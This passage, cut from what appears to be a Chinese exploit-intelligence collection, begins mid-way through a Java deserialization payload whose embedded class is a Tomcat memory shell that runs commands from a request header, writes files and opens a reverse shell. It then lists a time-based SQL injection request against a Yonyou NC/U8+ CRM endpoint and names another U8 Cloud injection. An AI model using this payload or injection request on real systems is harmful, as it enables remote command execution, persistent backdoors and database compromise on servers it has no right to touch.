\x16getDeclaredConstructoruq\x00~\x00\x1a\x00\x00\x00\x01vq\x00~\x00\x1asq\x00~\x00\x13uq\x00~\x00\x18\x00\x00\x00\x01uq\x00~\x00\x18\x00\x00\x00\x00t\x00\x0bnewInstanceuq\x00~\x00\x1a\x00\x00\x00\x01vq\x00~\x00\x18sq\x00~\x00\x13uq\x00~\x00\x18\x00\x00\x00\x02t\x00\x02A4ur\x00\x02[B\xac\xf3\x17\xf8\x06\x08T\xe0\x02\x00\x00xp\x00\x00\x1b\xbb\xca\xfe\xba\xbe\x00\x00\x001\x01\x9a\x0a\x00\x1e\x00\xad\x0a\x00C\x00\xae\x0a\x00C\x00\xaf\x0a\x00\x1e\x00\xb0\x08\x00\xb1\x0a\x00\x1c\x00\xb2\x0a\x00\xb3\x00\xb4\x0a\x00\xb3\x00\xb5\x07\x00\xb6\x0a\x00C\x00\xb7\x08\x00\xa5\x0a\x00!\x00\xb8\x08\x00\xb9\x08\x00\xba\x07\x00\xbb\x08\x00\xbc\x08\x00\xbd\x07\x00\xbe\x0a\x00\x1c\x00\xbf\x08\x00\xc0\x08\x00\xc1\x07\x00\xc2\x0b\x00\x16\x00\xc3\x0b\x00\xc4\x00\xc5\x0b\x00\xc4\x00\xc6\x08\x00\xc7\x08\x00\xc8\x07\x00\xc9\x0a\x00\x1c\x00\xca\x07\x00\xcb\x0a\x00\xcc\x00\xcd\x08\x00\xce\x07\x00\xcf\x08\x00\xd0\x0a\x00\x8f\x00\xd1\x0a\x00!\x00\xd2\x08\x00\xd3\x09\x00\xd4\x00\xd5\x0a\x00\xd4\x00\xd6\x08\x00\xd7\x0a\x00\x8f\x00\xd8\x0a\x00\x1c\x00\xd9\x08\x00\xda\x07\x00\xdb\x0a\x00\x1c\x00\xdc\x08\x00\xdd\x07\x00\xde\x08\x00\xdf\x08\x00\xe0\x0a\x00\x1c\x00\xe1\x07\x00\xe2\x0a\x00C\x00\xe3\x0a\x00\xe4\x00\xd8\x08\x00\xe5\x0a\x00!\x00\xe6\x08\x00\xe7\x0a\x00!\x00\xe8\x08\x00\xe9\x0a\x00!\x00\xea\x0a\x00\x8f\x00\xeb\x08\x00\xec\x0a\x00!\x00\xed\x08\x00\xee\x09\x00\x8f\x00\xef\x0a\x00\xd4\x00\xf0\x09\x00\x8f\x00\xf1\x07\x00\xf2\x0a\x00C\x00\xf3\x0a\x00C\x00\xf4\x08\x00\xa6\x08\x00\xf5\x08\x00\xf6\x0a\x00\x8f\x00\xf7\x08\x00\xf8\x0a\x00\x8f\x00\xf9\x07\x00\xfa\x0a\x00L\x00\xfb\x07\x00\xfc\x0a\x00N\x00\xfd\x0a\x00\x8f\x00\xfe\x0a\x00N\x00\xff\x0a\x00N\x01\x00\x0a\x00N\x01\x01\x0a\x00/\x01\x02\x0a\x00L\x01\x03\x0a\x00!\x01\x04\x08\x01\x05\x0a\x01\x06\x01\x07\x0a\x00!\x01\x08\x08\x01\x09\x08\x01\x0a\x08\x01\x0b\x07\x01\x0c\x0a\x00]\x00\xad\x0a\x00]\x01\x0d\x08\x01\x0e\x0a\x00]\x01\x02\x08\x01\x0f\x08\x01\x10\x08\x01\x11\x08\x01\x12\x0a\x01\x13\x01\x14\x0a\x01\x13\x01\x15\x07\x01\x16\x0a\x01\x17\x01\x18\x0a\x00h\x01\x19\x08\x01\x1a\x0a\x00h\x01\x1b\x0a\x00h\x00\xc5\x0a\x00h\x01\x1c\x0a\x01\x17\x01\x1d\x0a\x01\x17\x01\x1e\x08\x01\x1f\x08\x01 \x0a\x01\x13\x01!\x07\x01\"\x0a\x00t\x01#\x0a\x00t\x01\x18\x0a\x01\x17\x01$\x0a\x00t\x01$\x0a\x00t\x01%\x0a\x01&\x01'\x0a\x01&\x01\x28\x0a\x01\x29\x01*\x0a\x01\x29\x01\x00\x05\x00\x00\x00\x00\x00\x00\x002\x0a\x00C\x01+\x0a\x01\x17\x01,\x0a\x00t\x01\x01\x08\x01-\x0a\x00/\x01.\x08\x01/\x08\x010\x0a\x00\xd4\x011\x0a\x00\x8f\x012\x08\x013\x08\x014\x08\x015\x08\x016\x08\x00\xa9\x08\x017\x07\x018\x01\x00\x0cBASE64_CHARS\x01\x00\x12Ljava/lang/String;\x01\x00\x0dConstantValue\x08\x019\x01\x00\x02ip\x01\x00\x04port\x01\x00\x13Ljava/lang/Integer;\x01\x00\x06<init>\x01\x00\x03\x28\x29V\x01\x00\x04Code\x01\x00\x0fLineNumberTable\x01\x00\x0aExceptions\x01\x00\x09loadClass\x01\x00%\x28Ljava/lang/String;\x29Ljava/lang/Class;\x01\x00\x09Signature\x01\x00\x28\x28Ljava/lang/String;\x29Ljava/lang/Class<*>;\x01\x00\x05proxy\x01\x00&\x28Ljava/lang/String;\x29Ljava/lang/String;\x01\x00\x05write\x01\x008\x28Ljava/lang/String;Ljava/lang/String;\x29Ljava/lang/String;\x01\x00\x0aclearParam\x01\x00\x04exec\x01\x00\x07reverse\x01\x00'\x28Ljava/lang/String;I\x29Ljava/lang/String;\x01\x00\x03run\x01\x00\x06decode\x01\x00\x16\x28Ljava/lang/String;\x29[B\x01\x00\x0aSourceFile\x01\x00\x07A4.java\x0c\x00\x97\x00\x98\x0c\x01:\x01;\x0c\x01<\x01=\x0c\x01>\x01?\x01\x00\x07threads\x0c\x01@\x01A\x07\x01B\x0c\x01C\x01D\x0c\x01E\x01F\x01\x00\x13[Ljava/lang/Thread;\x0c\x01G\x01H\x0c\x01I\x01J\x01\x00\x04http\x01\x00\x06target\x01\x00\x12java/lang/Runnable\x01\x00\x06this$0\x01\x00\x07handler\x01\x00\x1ejava/lang/NoSuchFieldException\x0c\x01K\x01?\x01\x00\x06global\x01\x00\x0aprocessors\x01\x00\x0ejava/util/List\x0c\x01L\x01M\x07\x01N\x0c\x01O\x01P\x0c\x01Q\x01R\x01\x00\x03req\x01\x00\x0bgetResponse\x01\x00\x0fjava/lang/Class\x0c\x01S\x01T\x01\x00\x10java/lang/Object\x07\x01U\x0c\x01V\x01W\x01\x00\x09getHeader\x01\x00\x10java/lang/String\x01\x00\x03cmd\x0c\x00\xa0\x00\xa1\x0c\x01X\x01Y\x01\x00\x09setStatus\x07\x01Z\x0c\x01[\x01\\\x0c\x01]\x01^\x01\x00$org.apache.tomcat.util.buf.ByteChunk\x0c\x00\x9c\x00\x9d\x0c\x01_\x01R\x01\x00\x08setBytes\x01\x00\x02[B\x0c\x01`\x01T\x01\x00\x07doWrite\x01\x00\x13java/lang/Exception\x01\x00\x13java.nio.ByteBuffer\x01\x00\x04wrap\x0c\x01a\x00\x9d\x01\x00 java/lang/ClassNotFoundException\x0c\x01b\x01c\x07\x01d\x01\x00\x00\x0c\x01e\x01f\x01\x00\x10command not null\x0c\x01g\x01H\x01\x00\x05#####\x0c\x01h\x01i\x0c\x00\xa4\x00\xa1\x01\x00\x01:\x0c\x01j\x01k\x01\x00\"command reverse host format error!\x0c\x00\x94\x00\x91\x0c\x01l\x01m\x0c\x00\x95\x00\x96\x01\x00\x10java/lang/Thread\x0c\x00\x97\x01n\x0c\x01o\x00\x98\x01\x00\x05$$$$$\x01\x00\x12file format error!\x0c\x00\xa2\x00\xa3\x01\x00\x05@@@@@\x0c\x00\xa5\x00\xa1\x01\x00\x0cjava/io/File\x0c\x00\x97\x01p\x01\x00\x18java/io/FileOutputStream\x0c\x00\x97\x01q\x0c\x00\xa9\x00\xaa\x0c\x00\xa2\x01r\x0c\x01s\x00\x98\x0c\x01t\x00\x98\x0c\x01u\x01H\x0c\x01v\x01H\x0c\x01w\x01x\x01\x00\x07os.name\x07\x01y\x0c\x01z\x00\xa1\x0c\x01\x7b\x01H\x01\x00\x03win\x01\x00\x04ping\x01\x00\x02-n\x01\x00\x17java/lang/StringBuilder\x0c\x01|\x01\x7d\x01\x00\x05 -n 4\x01\x00\x02/c\x01\x00\x05 -t 4\x01\x00\x02sh\x01\x00\x02-c\x07\x01~\x0c\x01\x7f\x01\x80\x0c\x00\xa5\x01\x81\x01\x00\x11java/util/Scanner\x07\x01\x82\x0c\x01\x83\x01\x84\x0c\x00\x97\x01\x85\x01\x00\x02\\a\x0c\x01\x86\x01\x87\x0c\x01Q\x01H\x0c\x01\x88\x01\x84\x0c\x01\x89\x00\x98\x01\x00\x07/bin/sh\x01\x00\x07cmd.exe\x0c\x00\xa5\x01\x8a\x01\x00\x0fjava/net/Socket\x0c\x00\x97\x01\x8b\x0c\x01\x8c\x01\x8d\x0c\x01\x8e\x01P\x07\x01\x8f\x0c\x01\x90\x01\x91\x0c\x01\x92\x01\x91\x07\x01\x93\x0c\x00\xa2\x01\x94\x0c\x01\x95\x01\x96\x0c\x01\x97\x01\x91\x01\x00\x1dreverse execute error, msg ->\x0c\x01\x98\x01H\x01\x00\x01!\x01\x00\x13reverse execute ok!\x0c\x01\x99\x01\x91\x0c\x00\xa6\x00\xa7\x01\x00\x16sun.misc.BASE64Decoder\x01\x00\x0cdecodeBuffer\x01\x00\x10java.util.Base64\x01\x00\x0agetDecoder\x01\x00&org.apache.commons.codec.binary.Base64\x01\x00\x02A4\x01\x00@ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\x01\x00\x0dcurrentThread\x01\x00\x14\x28\x29Ljava/lang/Thread;\x01\x00\x0egetThreadGroup\x01\x00\x19\x28\x29Ljava/lang/ThreadGroup;\x01\x00\x08getClass\x01\x00\x13\x28\x29Ljava/lang/Class;\x01\x00\x10getDeclaredField\x01\x00-\x28Ljava/lang/String;\x29Ljava/lang/reflect/Field;\x01\x00\x17java/lang/reflect/Field\x01\x00\x0dsetAccessible\x01\x00\x04\x28Z\x29V\x01\x00\x03get\x01\x00&\x28Ljava/lang/Object;\x29Ljava/lang/Object;\x01\x00\x07getName\x01\x00\x14\x28\x29Ljava/lang/String;\x01\x00\x08contains\x01\x00\x1b\x28Ljava/lang/CharSequence;\x29Z\x01\x00\x0dgetSuperclass\x01\x00\x08iterator\x01\x00\x16\x28\x29Ljava/util/Iterator;\x01\x00\x12java/util/Iterator\x01\x00\x07hasNext\x01\x00\x03\x28\x29Z\x01\x00\x04next\x01\x00\x14\x28\x29Ljava/lang/Object;\x01\x00\x09getMethod\x01\x00@\x28Ljava/lang/String;[Ljava/lang/Class;\x29Ljava/lang/reflect/Method;\x01\x00\x18java/lang/reflect/Method\x01\x00\x06invoke\x01\x009\x28Ljava/lang/Object;[Ljava/lang/Object;\x29Ljava/lang/Object;\x01\x00\x08getBytes\x01\x00\x04\x28\x29[B\x01\x00\x11java/lang/Integer\x01\x00\x04TYPE\x01\x00\x11Ljava/lang/Class;\x01\x00\x07valueOf\x01\x00\x16\x28I\x29Ljava/lang/Integer;\x01\x00\x0bnewInstance\x01\x00\x11getDeclaredMethod\x01\x00\x07forName\x01\x00\x15getContextClassLoader\x01\x00\x19\x28\x29Ljava/lang/ClassLoader;\x01\x00\x15java/lang/ClassLoader\x01\x00\x06equals\x01\x00\x15\x28Ljava/lang/Object;\x29Z\x01\x00\x04trim\x01\x00\x0astartsWith\x01\x00\x15\x28Ljava/lang/String;\x29Z\x01\x00\x05split\x01\x00'\x28Ljava/lang/String;\x29[Ljava/lang/String;\x01\x00\x08parseInt\x01\x00\x15\x28Ljava/lang/String;\x29I\x01\x00\x17\x28Ljava/lang/Runnable;\x29V\x01\x00\x05start\x01\x00\x15\x28Ljava/lang/String;\x29V\x01\x00\x11\x28Ljava/io/File;\x29V\x01\x00\x05\x28[B\x29V\x01\x00\x05flush\x01\x00\x05close\x01\x00\x08toString\x01\x00\x0fgetAbsolutePath\x01\x00\x07replace\x01\x00D\x28Ljava/lang/CharSequence;Ljava/lang/CharSequence;\x29Ljava/lang/String;\x01\x00\x10java/lang/System\x01\x00\x0bgetProperty\x01\x00\x0btoLowerCase\x01\x00\x06append\x01\x00-\x28Ljava/lang/String;\x29Ljava/lang/StringBuilder;\x01\x00\x11java/lang/Runtime\x01\x00\x0agetRuntime\x01\x00\x15\x28\x29Ljava/lang/Runtime;\x01\x00\x28\x28[Ljava/lang/String;\x29Ljava/lang/Process;\x01\x00\x11java/lang/Process\x01\x00\x0egetInputStream\x01\x00\x17\x28\x29Ljava/io/InputStream;\x01\x00\x18\x28Ljava/io/InputStream;\x29V\x01\x00\x0cuseDelimiter\x01\x00'\x28Ljava/lang/String;\x29Ljava/util/Scanner;\x01\x00\x0egetErrorStream\x01\x00\x07destroy\x01\x00'\x28Ljava/lang/String;\x29Ljava/lang/Process;\x01\x00\x16\x28Ljava/lang/String;I\x29V\x01\x00\x0fgetOutputStream\x01\x00\x18\x28\x29Ljava/io/OutputStream;\x01\x00\x08isClosed\x01\x00\x13java/io/InputStream\x01\x00\x09available\x01\x00\x03\x28\x29I\x01\x00\x04read\x01\x00\x14java/io/OutputStream\x01\x00\x04\x28I\x29V\x01\x00\x05sleep\x01\x00\x04\x28J\x29V\x01\x00\x09exitValue\x01\x00\x0agetMessage\x01\x00\x08intValue\x00!\x00\x8f\x00\x1e\x00\x01\x00\x0f\x00\x03\x00\x1a\x00\x90\x00\x91\x00\x01\x00\x92\x00\x00\x00\x02\x00\x93\x00\x02\x00\x94\x00\x91\x00\x00\x00\x02\x00\x95\x00\x96\x00\x00\x00\x09\x00\x01\x00\x97\x00\x98\x00\x02\x00\x99\x00\x00\x03\xb6\x00\x06\x00\x13\x00\x00\x02\x8e*\xb7\x00\x01\xb8\x00\x02\xb6\x00\x03L+\xb6\x00\x04\x12\x05\xb6\x00\x06M,\x04\xb6\x00\x07,+\xb6\x00\x08\xc0\x00\x09\xc0\x00\x09N-:\x04\x19\x04\xbe6\x05\x036\x06\x15\x06\x15\x05\xa2\x02X\x19\x04\x15\x062:\x07\x19\x07\xc7\x00\x06\xa7\x02C\x19\x07\xb6\x00\x0a:\x08\x19\x08\x12\x0b\xb6\x00\x0c\x9a\x00\x0d\x19\x08\x12\x0d\xb6\x00\x0c\x9a\x00\x06\xa7\x02%\x19\x07\xb6\x00\x04\x12\x0e\xb6\x00\x06M,\x04\xb6\x00\x07,\x19\x07\xb6\x00\x08:\x09\x19\x09\xc1\x00\x0f\x9a\x00\x06\xa7\x02\x02\x19\x09\xb6\x00\x04\x12\x10\xb6\x00\x06M,\x04\xb6\x00\x07,\x19\x09\xb6\x00\x08:\x09\x19\x09\xb6\x00\x04\x12\x11\xb6\x00\x06M\xa7\x00\x16:\x0a\x19\x09\xb6\x00\x04\xb6\x00\x13\xb6\x00\x13\x12\x11\xb6\x00\x06M,\x04\xb6\x00\x07,\x19\x09\xb6\x00\x08:\x09\x19\x09\xb6\x00\x04\xb6\x00\x13\x12\x14\xb6\x00\x06M\xa7\x00\x10:\x0a\x19\x09\xb6\x00\x04\x12\x14\xb6\x00\x06M,\x04\xb6\x00\x07,\x19\x09\xb6\x00\x08:\x09\x19\x09\xb6\x00\x04\x12\x15\xb6\x00\x06M,\x04\xb6\x00\x07,\x19\x09\xb6\x00\x08\xc0\x00\x16\xc0\x00\x16:\x0a\x19\x0a\xb9\x00\x17\x01\x00:\x0b\x19\x0b\xb9\x00\x18\x01\x00\x99\x01[\x19\x0b\xb9\x00\x19\x01\x00:\x0c\x19\x0c\xb6\x00\x04\x12\x1a\xb6\x00\x06M,\x04\xb6\x00\x07,\x19\x0c\xb6\x00\x08:\x0d\x19\x0d\xb6\x00\x04\x12\x1b\x03\xbd\x00\x1c\xb6\x00\x1d\x19\x0d\x03\xbd\x00\x1e\xb6\x00\x1f:\x0e\x19\x0d\xb6\x00\x04\x12 \x04\xbd\x00\x1cY\x03\x12!S\xb6\x00\x1d\x19\x0d\x04\xbd\x00\x1eY\x03\x12\"S\xb6\x00\x1f\xc0\x00!:\x0f\x19\x0f\xc7\x00\x06\xa7\xff\x91*\x19\x0f\xb6\x00#\xb6\x00$:\x10\x19\x0e\xb6\x00\x04\x12%\x04\xbd\x00\x1cY\x03\xb2\x00&S\xb6\x00\x1d\x19\x0e\x04\xbd\x00\x1eY\x03\x11\x00\xc8\xb8\x00'S\xb6\x00\x1fW*\x12\x28\xb6\x00\x29:\x11\x19\x11\xb6\x00*:\x09\x19\x11\x12+\x06\xbd\x00\x1cY\x03\x12,SY\x04\xb2\x00&SY\x05\xb2\x00&S\xb6\x00-\x19\x09\x06\xbd\x00\x1eY\x03\x19\x10SY\x04\x03\xb8\x00'SY\x05\x19\x10\xbe\xb8\x00'S\xb6\x00\x1fW\x19\x0e\xb6\x00\x04\x12.\x04\xbd\x00\x1cY\x03\x19\x11S\xb6\x00\x1d\x19\x0e\x04\xbd\x00\x1eY\x03\x19\x09S\xb6\x00\x1fW\xa7\x00O:\x11*\x120\xb6\x00\x29:\x12\x19\x12\x121\x04\xbd\x00\x1cY\x03\x12,S\xb6\x00-\x19\x12\x04\xbd\x00\x1eY\x03\x19\x10S\xb6\x00\x1f:\x09\x19\x0e\xb6\x00\x04\x12.\x04\xbd\x00\x1cY\x03\x19\x12S\xb6\x00\x1d\x19\x0e\x04\xbd\x00\x1eY\x03\x19\x09S\xb6\x00\x1fW\xa7\x00\x0e\xa7\x00\x05:\x08\x84\x06\x01\xa7\xfd\xa7\xb1\x00\x07\x00\xa0\x00\xab\x00\xae\x00\x12\x00\xce\x00\xdc\x00\xdf\x00\x12\x01\xc4\x020\x023\x00/\x00?\x00D\x02\x85\x00/\x00G\x00b\x02\x85\x00/\x00e\x00\x85\x02\x85\x00/\x00\x88\x02\x7f\x02\x85\x00/\x00\x01\x00\x9a\x00\x00\x00\xde\x007\x00\x00\x00\x17\x00\x04\x00\x18\x00\x0b\x00\x19\x00\x15\x00\x1a\x00\x1a\x00\x1b\x00&\x00\x1d\x00?\x00\x1f\x00G\x00 \x00N\x00!\x00e\x00\"\x00p\x00#\x00u\x00$\x00\x7d\x00%\x00\x88\x00&\x00\x93\x00'\x00\x98\x00\x28\x00\xa0\x00*\x00\xab\x00-\x00\xae\x00+\x00\xb0\x00,\x00\xc1\x00.\x00\xc6\x00/\x00\xce\x001\x00\xdc\x004\x00\xdf\x002\x00\xe1\x003\x00\xec\x005\x00\xf1\x006\x00\xf9\x007\x01\x04\x008\x01\x09\x009\x01\x17\x00:\x013\x00;\x01>\x00<\x01C\x00=\x01K\x00>\x01d\x00?\x01\x8a\x00@\x01\x8f\x00A\x01\x92\x00C\x01\x9d\x00D\x01\xc4\x00F\x01\xcc\x00G\x01\xd3\x00H\x02\x0e\x00I\x020\x00N\x023\x00J\x025\x00K\x02=\x00L\x02]\x00M\x02\x7f\x00O\x02\x82\x00S\x02\x85\x00Q\x02\x87\x00\x1d\x02\x8d\x00U\x00\x9b\x00\x00\x00\x04\x00\x01\x00/\x00\x01\x00\x9c\x00\x9d\x00\x03\x00\x99\x00\x00\x009\x00\x02\x00\x03\x00\x00\x00\x11+\xb8\x002\xb0M\xb8\x00\x02\xb6\x004+\xb6\x005\xb0\x00\x01\x00\x00\x00\x04\x00\x05\x003\x00\x01\x00\x9a\x00\x00\x00\x0e\x00\x03\x00\x00\x00_\x00\x05\x00`\x00\x06\x00a\x00\x9b\x00\x00\x00\x04\x00\x01\x003\x00\x9e\x00\x00\x00\x02\x00\x9f\x00\x01\x00\xa0\x00\xa1\x00\x01\x00\x99\x00\x00\x00\xff\x00\x04\x00\x04\x00\x00\x00\x9b+\xc6\x00\x0c\x126+\xb6\x007\x99\x00\x06\x128\xb0+\xb6\x009L+\x12:\xb6\x00;\x99\x00;*+\xb7\x00<\x12=\xb6\x00>M,\xbe\x05\x9f\x00\x06\x12?\xb0*,\x032\xb5\x00@*,\x042\xb8\x00A\xb8\x00'\xb5\x00B\xbb\x00CY*\xb7\x00DN-\xb6\x00E\x12F\xb0+\x12G\xb6\x00;\x99\x00\"*+\xb7\x00<\x12=\xb6\x00>M,\xbe\x05\x9f\x00\x06\x12H\xb0*,\x032,\x042\xb6\x00I\xb0+\x12J\xb6\x00;\x99\x00\x0d**+\xb7\x00<\xb6\x00K\xb0**+\xb7\x00<\xb6\x00K\xb0\x00\x00\x00\x01\x00\x9a\x00\x00\x00R\x00\x14\x00\x00\x00k\x00\x0d\x00l\x00\x10\x00n\x00\x15\x00o\x00\x1e\x00q\x00\x29\x00r\x00/\x00s\x002\x00u\x009\x00v\x00F\x00w\x00O\x00x\x00S\x00y\x00V\x00z\x00_\x00\x7b\x00j\x00|\x00p\x00\x7d\x00s\x00\x7f\x00~\x00\x80\x00\x87\x00\x81\x00\x91\x00\x83\x00\x01\x00\xa2\x00\xa3\x00\x01\x00\x99\x00\x00\x00v\x00\x03\x00\x05\x00\x00\x006\xbb\x00LY+\xb7\x00MN\xbb\x00NY-\xb7\x00O:\x04\x19\x04,\xb8\x00P\xb6\x00Q\x19\x04\xb6\x00R\x19\x04\xb6\x00S\xa7\x00\x0b:\x04\x19\x04\xb6\x00T\xb0-\xb6\x00U\xb0\x00\x01\x00\x09\x00&\x00\x29\x00/\x00\x01\x00\x9a\x00\x00\x00&\x00\x09\x00\x00\x00\x8e\x00\x09\x00\x90\x00\x13\x00\x91\x00\x1c\x00\x92\x00!\x00\x93\x00&\x00\x96\x00\x29\x00\x94\x00+\x00\x95\x001\x00\x97\x00\x02\x00\xa4\x00\xa1\x00\x01\x00\x99\x00\x00\x00/\x00\x03\x00\x02\x00\x00\x00\x17+\x12:\x126\xb6\x00V\x12J\x126\xb6\x00V\x12G\x126\xb6\x00V\xb0\x00\x00\x00\x01\x00\x9a\x00\x00\x00\x06\x00\x01\x00\x00\x00\xa0\x00\x01\x00\xa5\x00\xa1\x00\x01\x00\x99\x00\x00\x01\xc3\x00\x04\x00\x09\x00\x00\x01'\x12W\xb8\x00X\xb6\x00YM+\xb6\x009L\x01N,\x12Z\xb6\x00\x0c\x99\x00@+\x12[\xb6\x00\x0c\x99\x00 +\x12\\\xb6\x00\x0c\x9a\x00\x17\xbb\x00]Y\xb7\x00^+\xb6\x00_\x12`\xb6\x00_\xb6\x00aL\x06\xbd\x00!Y\x03\x12\"SY\x04\x12bSY\x05+S:\x04\xa7\x00=+\x12[\xb6\x00\x0c\x99\x00 +\x12\\\xb6\x00\x0c\x9a\x00\x17\xbb\x00]Y\xb7\x00^+\xb6\x00_\x12c\xb6\x00_\xb6\x00aL\x06\xbd\x00!Y\x03\x12dSY\x04\x12eSY\x05+S:\x04\xb8\x00f\x19\x04\xb6\x00gN\xbb\x00hY-\xb6\x00i\xb7\x00j\x12k\xb6\x00l:\x05\x19\x05\xb6\x00m\x99\x00\x0b\x19\x05\xb6\x00n\xa7\x00\x05\x126:\x06\xbb\x00hY-\xb6\x00o\xb7\x00j\x12k\xb6\x00l:\x05\xbb\x00]Y\xb7\x00^\x19\x06\xb6\x00_\x19\x05\xb6\x00m\x99\x00\x0b\x19\x05\xb6\x00n\xa7\x00\x05\x126\xb6\x00_\xb6\x00a:\x06\x19\x06:\x07-\xc6\x00\x07-\xb6\x00p\x19\x07\xb0:\x05\x19\x05\xb6\x00T:\x06-\xc6\x00\x07-\xb6\x00p\x19\x06\xb0:\x08-\xc6\x00\x07-\xb6\x00p\x19\x08\xbf\x00\x04\x00\x90\x00\xfb\x01\x06\x00/\x00\x90\x00\xfb\x01\x1a\x00\x00\x01\x06\x01\x0f\x01\x1a\x00\x00\x01\x1a\x01\x1c\x01\x1a\x00\x00\x00\x01\x00\x9a\x00\x00\x00j\x00\x1a\x00\x00\x00\xa9\x00\x09\x00\xaa\x00\x0e\x00\xab\x00\x10\x00\xad\x00\x19\x00\xae\x00+\x00\xaf\x00?\x00\xb1\x00V\x00\xb3\x00h\x00\xb4\x00|\x00\xb6\x00\x90\x00\xb9\x00\x99\x00\xba\x00\xab\x00\xbb\x00\xbf\x00\xbc\x00\xd1\x00\xbd\x00\xf7\x00\xbe\x00\xfb\x00\xc2\x00\xff\x00\xc3\x01\x03\x00\xbe\x01\x06\x00\xbf\x01\x08\x00\xc0\x01\x0f\x00\xc2\x01\x13\x00\xc3\x01\x17\x00\xc0\x01\x1a\x00\xc2\x01 \x00\xc3\x00\x01\x00\xa6\x00\xa7\x00\x01\x00\x99\x00\x00\x01r\x00\x04\x00\x0c\x00\x00\x00\xe2\x12W\xb8\x00X\xb6\x00Y\x12Z\xb6\x00\x0c\x9a\x00\x09\x12qN\xa7\x00\x06\x12rN\xb8\x00f-\xb6\x00s:\x04\xbb\x00tY+\x1c\xb7\x00u:\x05\x19\x04\xb6\x00i:\x06\x19\x04\xb6\x00o:\x07\x19\x05\xb6\x00v:\x08\x19\x04\xb6\x00w:\x09\x19\x05\xb6\x00x:\x0a\x19\x05\xb6\x00y\x9a\x00`\x19\x06\xb6\x00z\x9e\x00\x10\x19\x0a\x19\x06\xb6\x00\x7b\xb6\x00|\xa7\xff\xee\x19\x07\xb6\x00z\x9e\x00\x10\x19\x0a\x19\x07\xb6\x00\x7b\xb6\x00|\xa7\xff\xee\x19\x08\xb6\x00z\x9e\x00\x10\x19\x09\x19\x08\xb6\x00\x7b\xb6\x00|\xa7\xff\xee\x19\x0a\xb6\x00\x7d\x19\x09\xb6\x00\x7d\x14\x00~\xb8\x00\x80\x19\x04\xb6\x00\x81W\xa7\x00\x08:\x0b\xa7\xff\x9e\x19\x04\xb6\x00p\x19\x05\xb6\x00\x82\xa7\x00 N\xbb\x00]Y\xb7\x00^\x12\x83\xb6\x00_-\xb6\x00\x84\xb6\x00_\x12\x85\xb6\x00_\xb6\x00a\xb0\x12\x86\xb0\x00\x02\x00\xa7\x00\xad\x00\xb0\x00/\x00\x00\x00\xbf\x00\xc2\x00/\x00\x01\x00\x9a\x00\x00\x00n\x00\x1b\x00\x00\x00\xd1\x00\x10\x00\xd2\x00\x16\x00\xd4\x00\x19\x00\xd6\x00\"\x00\xd7\x00-\x00\xd8\x00B\x00\xd9\x00P\x00\xda\x00X\x00\xdb\x00`\x00\xdc\x00m\x00\xde\x00u\x00\xdf\x00\x82\x00\xe1\x00\x8a\x00\xe2\x00\x97\x00\xe4\x00\x9c\x00\xe5\x00\xa1\x00\xe6\x00\xa7\x00\xe8\x00\xad\x00\xe9\x00\xb0\x00\xea\x00\xb2\x00\xeb\x00\xb5\x00\xed\x00\xba\x00\xee\x00\xbf\x00\xf1\x00\xc2\x00\xef\x00\xc3\x00\xf0\x00\xdf\x00\xf2\x00\x01\x00\xa8\x00\x98\x00\x01\x00\x99\x00\x00\x00-\x00\x03\x00\x01\x00\x00\x00\x11**\xb4\x00@*\xb4\x00B\xb6\x00\x87\xb6\x00\x88W\xb1\x00\x00\x00\x01\x00\x9a\x00\x00\x00\x0a\x00\x02\x00\x00\x00\xf7\x00\x10\x00\xf8\x00\x09\x00\xa9\x00\xaa\x00\x01\x00\x99\x00\x00\x01\x1c\x00\x06\x00\x04\x00\x00\x00\xac\x01L\x12\x89\xb8\x002M,\x12\x8a\x04\xbd\x00\x1cY\x03\x12!S\xb6\x00\x1d,\xb6\x00*\x04\xbd\x00\x1eY\x03*S\xb6\x00\x1f\xc0\x00,\xc0\x00,L\xa7\x00\x04M+\xc7\x00C\x12\x8b\xb8\x002\x12\x8c\x03\xbd\x00\x1c\xb6\x00\x1d\x01\x03\xbd\x00\x1e\xb6\x00\x1fM,\xb6\x00\x04\x12\x8d\x04\xbd\x00\x1cY\x03\x12!S\xb6\x00\x1d,\x04\xbd\x00\x1eY\x03*S\xb6\x00\x1f\xc0\x00,\xc0\x00,L\xa7\x00\x04M+\xc7\x004\x12\x8e\xb8\x002M,\x12\x8d\x04\xbd\x00\x1cY\x03\x12!S\xb6\x00\x1dN-,\xb6\x00*\x04\xbd\x00\x1eY\x03*S\xb6\x00\x1f\xc0\x00,\xc0\x00,L\xa7\x00\x04M+\xb0\x00\x03\x00\x02\x00-\x000\x00/\x005\x00q\x00t\x00/\x00y\x00\xa6\x00\xa9\x00/\x00\x01\x00\x9a\x00\x00\x00F\x00\x11\x00\x00\x01\x00\x00\x02\x01\x02\x00\x08\x01\x03\x00-\x01\x06\x000\x01\x04\x001\x01\x07\x005\x01\x09\x00L\x01\x0a\x00q\x01\x0d\x00t\x01\x0b\x00u\x01\x0f\x00y\x01\x11\x00\x7f\x01\x12\x00\x8f\x01\x13\x00\xa6\x01\x16\x00\xa9\x01\x14\x00\xaa\x01\x18\x00\x01\x00\xab\x00\x00\x00\x02\x00\xact\x00\x0bdefineClassuq\x00~\x00\x1a\x00\x00\x00\x02vr\x00\x10java.lang.String\xa0\xf0\xa48z;\xb3B\x02\x00\x00xpvq\x00~\x00\x28sq\x00~\x00\x13uq\x00~\x00\x18\x00\x00\x00\x01uq\x00~\x00\x1a\x00\x00\x00\x00q\x00~\x00\x1cuq\x00~\x00\x1a\x00\x00\x00\x01q\x00~\x00\x1esq\x00~\x00\x13uq\x00~\x00\x18\x00\x00\x00\x01uq\x00~\x00\x18\x00\x00\x00\x00q\x00~\x00\"uq\x00~\x00\x1a\x00\x00\x00\x01q\x00~\x00$sq\x00~\x00\x0fsq\x00~\x00\x00w\x0c\x00\x00\x00\x10?@\x00\x00\x00\x00\x00\x00xsr\x00\x11java.util.HashMap\x05\x07\xda\xc1\xc3\x16`\xd1\x03\x00\x02F\x00\x0aloadFactorI\x00\x09thresholdxp?@\x00\x00\x00\x00\x00\x00w\x08\x00\x00\x00\x10\x00\x00\x00\x00xxx")}}
用友NC U8+ CRM complainbilldetail SQL注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
NC633、NC65 |
/ebvp/advorappcoll/complainbilldetail |
WAF封禁路路径,等待发布补丁 |
729 |
nday |
漏洞详情
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:8'-- HTTP/1.1
用友U8 Cloud linkntb存在SQL注入漏洞
